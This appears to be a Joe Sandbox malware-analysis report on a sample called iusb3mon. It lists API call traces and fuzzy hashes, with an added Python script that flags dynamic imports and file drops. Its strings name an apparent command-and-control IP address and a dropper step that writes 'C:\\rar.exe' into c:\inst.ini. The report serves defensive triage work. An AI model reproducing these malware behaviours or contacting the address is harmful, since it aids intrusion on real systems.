                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: b8e26979bf8d8161245e5de4291398143350ea50210d0f93118339cc90e6b286
                                                                                                                    • Instruction ID: eb014b9e8cba8e501ac08becd78b798391a563477d32d79aa030938147a40784
                                                                                                                    • Opcode Fuzzy Hash: b8e26979bf8d8161245e5de4291398143350ea50210d0f93118339cc90e6b286
                                                                                                                    • Instruction Fuzzy Hash: A4F0FF70B207065BDB74BE7ADC44B57F7EC6F50950B0A4919E851D3650DB78F445CA20
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0625B63F
                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0625B646
                                                                                                                    • GetDC.USER32(00000000), ref: 0625B65F
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0625B670
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0625B678
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0625B680
                                                                                                                      • Part of subcall function 0625CD61: GetSystemMetrics.USER32(00000002), ref: 0625CD73
                                                                                                                      • Part of subcall function 0625CD61: GetSystemMetrics.USER32(00000003), ref: 0625CD7D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1151147025-0
                                                                                                                    • Opcode ID: 34e378f819761107f16ab03cd1d30e7d776d093f838ba38160cb257266c0d9b8
                                                                                                                    • Instruction ID: 1f4d0e0ebdba4fddc97df5ce7b5f12fcb5c234c5d056ea2578992dab8876f34d
                                                                                                                    • Opcode Fuzzy Hash: 34e378f819761107f16ab03cd1d30e7d776d093f838ba38160cb257266c0d9b8
                                                                                                                    • Instruction Fuzzy Hash: 05F03070640700AAE6706B619C8DF277BA5EB81B52F02442EEB81962D0DAB09841CEA1
                                                                                                                    APIs
                                                                                                                    • GetVersionExA.KERNEL32 ref: 0624EC1B
                                                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0624EC50
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0624ECB0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                     • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                    • API String ID: 1385375860-4131005785
                                                                                                                    • Opcode ID: 134045c6ce8423a0b0cf09b7850c34ae44ad83e096f07e07f1db6dc77fc0f0ce
                                                                                                                    • Instruction ID: de0ca9f33ae5e981157585abf9173e4bc430c268083656886825ef74d913115d
                                                                                                                    • Opcode Fuzzy Hash: 134045c6ce8423a0b0cf09b7850c34ae44ad83e096f07e07f1db6dc77fc0f0ce
                                                                                                                    • Instruction Fuzzy Hash: 29312671D7129AADFBBDB670AC84AED3B6CBB06304F1A04D5DDC5DA081E6708AC5CB11
APIs
• SendMessageA.USER32(00000000,00000405,00000000,?), ref: 06259A74
• GetWindowLongA.USER32(?,000000FC), ref: 06259A85
• GetWindowLongA.USER32(?,000000FC), ref: 06259A95
• SetWindowLongA.USER32(?,000000FC,?), ref: 06259AB1
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: LongWindow$MessageSend
• String ID: (
• API String ID: 2178440468-3887548279
• Opcode ID: aa1fc9971dbfee24638b5fb30b07f395a8aefa6801d8d5c2dc0f5558ea430266
• Instruction ID: c840ea37c4f5a78bab66b0a03d72ab16542ff65c84fa5441522320eeccdf5e8c
• Opcode Fuzzy Hash: aa1fc9971dbfee24638b5fb30b07f395a8aefa6801d8d5c2dc0f5558ea430266
• Instruction Fuzzy Hash: 0B31AE30E20341EFDBB1AF65C884B69B7A5BF44210F16422DED5297690DB70A880CFA1
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5EE195CD,?,?,00000000,001EDA11,000000FF,?,001DDACE,?,?,001DDAA2,00000016), ref: 001DDB73
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001DDB85
• FreeLibrary.KERNEL32(00000000,?,00000000,001EDA11,000000FF,?,001DDACE,?,?,001DDAA2,00000016), ref: 001DDBA7
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 8a64c4445074ee1c1b71ed08907af48c810a546cec92a38d0c6b670fe6ae858c
• Instruction ID: ab2a1d0b2f414a6deebb50a72d77f64cfacad99ef996aac80ac1890d041aa462
• Opcode Fuzzy Hash: 8a64c4445074ee1c1b71ed08907af48c810a546cec92a38d0c6b670fe6ae858c
• Instruction Fuzzy Hash: D001A271A00699AFDB018B90DC49FBEBBF9FB44B24F000526F811A6690DB749D80CA80
APIs
  • Part of subcall function 062488DD: EnterCriticalSection.KERNEL32(?,?,?,06248958,00000005,00000005), ref: 062488E5
  • Part of subcall function 062488DD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,06248958,00000005,00000005), ref: 062488FD
• LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 0624895D
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 0624896B
• FreeLibrary.KERNEL32(00000000), ref: 0624897F
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
• String ID: closesocket$ws2_32.dll
• API String ID: 2819327233-181964208
• Opcode ID: 7b90803c1228d0609c64caea324384ddacc9c19aa4579a9402d08e225b16e13a
• Instruction ID: 83e113d7b18267d367b29d8991c759a57b35456ba37217d5c6f636665c4a773d
• Opcode Fuzzy Hash: 7b90803c1228d0609c64caea324384ddacc9c19aa4579a9402d08e225b16e13a
• Instruction Fuzzy Hash: 5BF024BA5203047FD764A754EC4EEEF7BADCB85661F020129FE45D2240FAB0DA40CAB1
APIs
• GetSystemMetrics.USER32(00000000), ref: 0624387D
• GetSystemMetrics.USER32(00000001), ref: 06243881
• ChangeDisplaySettingsA.USER32(?,00000000), ref: 062438B4
• ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 062438C9
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: ChangeDisplayMetricsSettingsSystem
• String ID:
• API String ID: 2205422386-3916222277
• Opcode ID: d769a0d034cf79ebb49a1bd99b906fc256ec7d07b2251890b746b00ea446d571
• Instruction ID: 32595ea8458aed19e6eaf84a5f6d36b1eac688f856928a13a9ed77e051992bc8
• Opcode Fuzzy Hash: d769a0d034cf79ebb49a1bd99b906fc256ec7d07b2251890b746b00ea446d571
• Instruction Fuzzy Hash: 55F05E71D2532DEAFB20EBA5DC09F8E7BB8AB04748F100055A608BB1C1D3F065088FE1
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
• WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
• CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\\rar.exe$c:\inst.ini
• API String ID: 1065093856-1710477331
• Opcode ID: 55e335b40ffbeadfb718bd2ca7546ea441e294df273cbeed9a311693ca04ac40
• Instruction ID: c88cc571bcc346eeb932f1bd3f0b20254f9053fb1825420b78aa5ea6f3380ded
• Opcode Fuzzy Hash: 55e335b40ffbeadfb718bd2ca7546ea441e294df273cbeed9a311693ca04ac40
• Instruction Fuzzy Hash: 87E048712423197FFA311E61BCCAFEB7B1EEB056D8F014121FF04D5550D6619E418AB5
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,062479A5,?,?,?), ref: 06247642
• GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 06247654
• FreeLibrary.KERNEL32(00000000), ref: 06247676
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: RtlGetNtVersionNumbers$ntdll.dll
• API String ID: 145871493-1263206204
• Opcode ID: 20ab9e08b6dbc6a7b78a6d01419869df413c33b16eea490a6e187e6587d60196
• Instruction ID: 9f75d8d17015c871869890883ad2ec06ca9ac25ff8c26f420699c7d5dda9063a
• Opcode Fuzzy Hash: 20ab9e08b6dbc6a7b78a6d01419869df413c33b16eea490a6e187e6587d60196
• Instruction Fuzzy Hash: B8E0E5322143236692212F55BC4DA4B7A669BC0E50B020058FD50A1100CB30CC45D6A2
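The function listings above record two behaviours an analyst usually wants pulled out of a report like this automatically: runtime import resolution (LoadLibraryA/GetModuleHandleExW followed by GetProcAddress for ws2_32!closesocket, mscoree!CorExitProcess and ntdll!RtlGetNtVersionNumbers) and a file drop (CreateFileA opened with GENERIC_WRITE on c:\inst.ini, then WriteFile of the string C:\\rar.exe). The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the "APIs" call lines in the visible text format of these listings (the `Call`, `parse_functions`, `find_dynamic_imports` and `find_file_drops` names are mine, and the embedded input is constructed from the call lines shown on this page) and applies the two heuristics. Assumptions: a hex argument is exactly eight hex digits, anything else that is not `?` is a resolved string, and a "drop" requires the write access bit plus a later WriteFile in the same function.

```python
import re
from dataclasses import dataclass

# Constructed input: API call lines copied from the function listings on this page,
# grouped under the report's "APIs" headers. This is the rendered text, not a Joe Sandbox export format.
SAMPLE_REPORT = r"""APIs
  • Part of subcall function 062488DD: EnterCriticalSection.KERNEL32(?,?,?,06248958,00000005,00000005), ref: 062488E5
• LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 0624895D
• GetProcAddress.KERNEL32(00000000,closesocket), ref: 0624896B
• FreeLibrary.KERNEL32(00000000), ref: 0624897F
APIs
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
• WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
• CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5EE195CD,?,?,00000000,001EDA11,000000FF,?,001DDACE,?,?,001DDAA2,00000016), ref: 001DDB73
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001DDB85
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,062479A5,?,?,?), ref: 06247642
• GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 06247654
• FreeLibrary.KERNEL32(00000000), ref: 06247676
APIs
• GetSystemMetrics.USER32(00000000), ref: 0624387D
• ChangeDisplaySettingsA.USER32(?,00000000), ref: 062438B4
"""

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE(args), ref: ADDRESS
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # assumption: report prints all numeric args as 8 hex digits
GENERIC_WRITE = 0x40000000                 # CreateFile dwDesiredAccess bit


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str


def parse_functions(text):
    """Split the listing into per-function call lists; each 'APIs' header starts a new function."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.append(Call(m.group("api"), m.group("module"), args, m.group("ref").upper()))
    return functions


def is_symbolic(arg):
    """True for a resolved string (library, export, path) rather than a hex value or an unknown '?'."""
    return arg not in ("", "?") and not HEX_RE.match(arg)


def find_dynamic_imports(functions):
    """Pair each LoadLibrary*/GetModuleHandle* with the next GetProcAddress in the same function."""
    found = []
    for calls in functions:
        lib = None
        for c in calls:
            if c.api.startswith(("LoadLibrary", "GetModuleHandle")):
                names = [a for a in c.args if is_symbolic(a)]
                lib = names[0] if names else None
            elif c.api == "GetProcAddress" and lib and len(c.args) > 1 and is_symbolic(c.args[1]):
                found.append((lib.lower(), c.args[1], c.ref))
                lib = None
    return found


def find_file_drops(functions):
    """Flag CreateFile* with GENERIC_WRITE on a path, followed by WriteFile of a string in the same function."""
    drops = []
    for calls in functions:
        target = None
        for c in calls:
            if c.api.startswith("CreateFile") and len(c.args) > 1 and HEX_RE.match(c.args[1]):
                access = int(c.args[1], 16)
                # the path may only appear in the trailing stack context, so scan every argument
                paths = [a for a in c.args if is_symbolic(a) and ("\\" in a or "/" in a)]
                target = paths[0] if (access & GENERIC_WRITE) and paths else None
            elif c.api == "WriteFile" and target:
                payload = c.args[1] if len(c.args) > 1 and is_symbolic(c.args[1]) else None
                drops.append((target, payload, c.ref))
                target = None
    return drops


if __name__ == "__main__":
    funcs = parse_functions(SAMPLE_REPORT)
    for lib, export, ref in find_dynamic_imports(funcs):
        print(f"dynamic import  {lib}!{export}  (GetProcAddress at {ref})")
    for path, payload, ref in find_file_drops(funcs):
        print(f"file drop       {path} <- {payload!r}  (WriteFile at {ref})")
```

Run against the constructed input it reports three dynamic imports and one drop of C:\\rar.exe into c:\inst.ini. The mscoree!CorExitProcess pair is CRT exit code and shows up in ordinary MSVC binaries, so a triage rule should score it lower than the ws2_32 and ntdll pairs rather than suppress it outright; the grouping by function is what keeps an unrelated GetProcAddress elsewhere in the binary from being paired with the wrong LoadLibrary.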
APIs
• LocalAlloc.KERNEL32(00000040,0000046D,?,062420A0,?,00000000,00000000,?), ref: 06243AF1
• LocalSize.KERNEL32(00000000), ref: 06243B17
• Sleep.KERNEL32(00000001,00000000,00000000), ref: 06243B2A
• LocalFree.KERNEL32(00000000), ref: 06243B31
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: Local$AllocFreeSizeSleep
• String ID: 202.79.169.178
• API String ID: 1864957939-4186200246
• Opcode ID: 6f7e89ee3ea0ac64f710ff2dcde36b6fc30f5fcee39b56eeeeb1660a45f3d966
• Instruction ID: 1c424286129970d88d6ea7a718dcb6987b1e7e53b9eb8ba42147cab6f4d790f7
• Opcode Fuzzy Hash: 6f7e89ee3ea0ac64f710ff2dcde36b6fc30f5fcee39b56eeeeb1660a45f3d966
• Instruction Fuzzy Hash: F6E09275A017637BD2A17B60BC0DFEF3A999F09B61F050104FF95E1584DB60D6808BA7
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,062479AA,?,?,?), ref: 062474B8
• GetProcAddress.KERNEL32(00000000), ref: 062474BF
• GetCurrentProcess.KERNEL32(00000000,?,?,062479AA,?,?), ref: 062474D3
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
• String ID: IsWow64Process$kernel32.dll
• API String ID: 4190356694-3024904723
• Opcode ID: 01c7666724a6d95ec5868d6fe886b9764d105ccee8d679e50fd89ad507e86c73
• Instruction ID: 25b6d4f7625c0c72e0744c9d10e6654c3d57d713138ab7ad25886970a2cf91ca
• Opcode Fuzzy Hash: 01c7666724a6d95ec5868d6fe886b9764d105ccee8d679e50fd89ad507e86c73
• Instruction Fuzzy Hash: 5BE09272C11316FFDB2097A1A90D9AE7BBCEF00691B010050F901E2004E7B0CB008B90
APIs
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06241B85), ref: 06241B47
• GetProcAddress.KERNEL32(00000000), ref: 06241B4E
• GetCurrentProcess.KERNEL32(00000000,?,?,?,06241B85), ref: 06241B5E
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: AddressCurrentHandleModuleProcProcess
• String ID: IsWow64Process$kernel32
• API String ID: 4190356694-3789238822
• Opcode ID: 75f1b339fc54077defcf6586b1d2af53a85a3cc0d1ea0b31c3e0ca7de3bd6ee8
• Instruction ID: 0a34c71295a8a1dc677b5f990732225c94f7e682a7faf1ea02fb04524be2c2b2
• Opcode Fuzzy Hash: 75f1b339fc54077defcf6586b1d2af53a85a3cc0d1ea0b31c3e0ca7de3bd6ee8
• Instruction Fuzzy Hash: 30E08C72C1131AFBDB20A7E5AC0EA8E7BACDF04755B010180FA01E3504D7B4DB00DBA0
APIs
• GetStartupInfoA.KERNEL32(?), ref: 06250370
• GetFileType.KERNEL32(00000480), ref: 0625041B
• GetStdHandle.KERNEL32(-000000F6), ref: 0625047E
• GetFileType.KERNEL32(00000000), ref: 0625048C
• SetHandleCount.KERNEL32 ref: 062504C3
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 1694429a91bf804f8863137c3956473e8df4af88eb324e2d2022e132a0f3b2dd
• Instruction ID: a84127797cff080b24d0f6ebaaf9af18e17afe9ed429b9727cf4701bb1ab89b3
• Opcode Fuzzy Hash: 1694429a91bf804f8863137c3956473e8df4af88eb324e2d2022e132a0f3b2dd
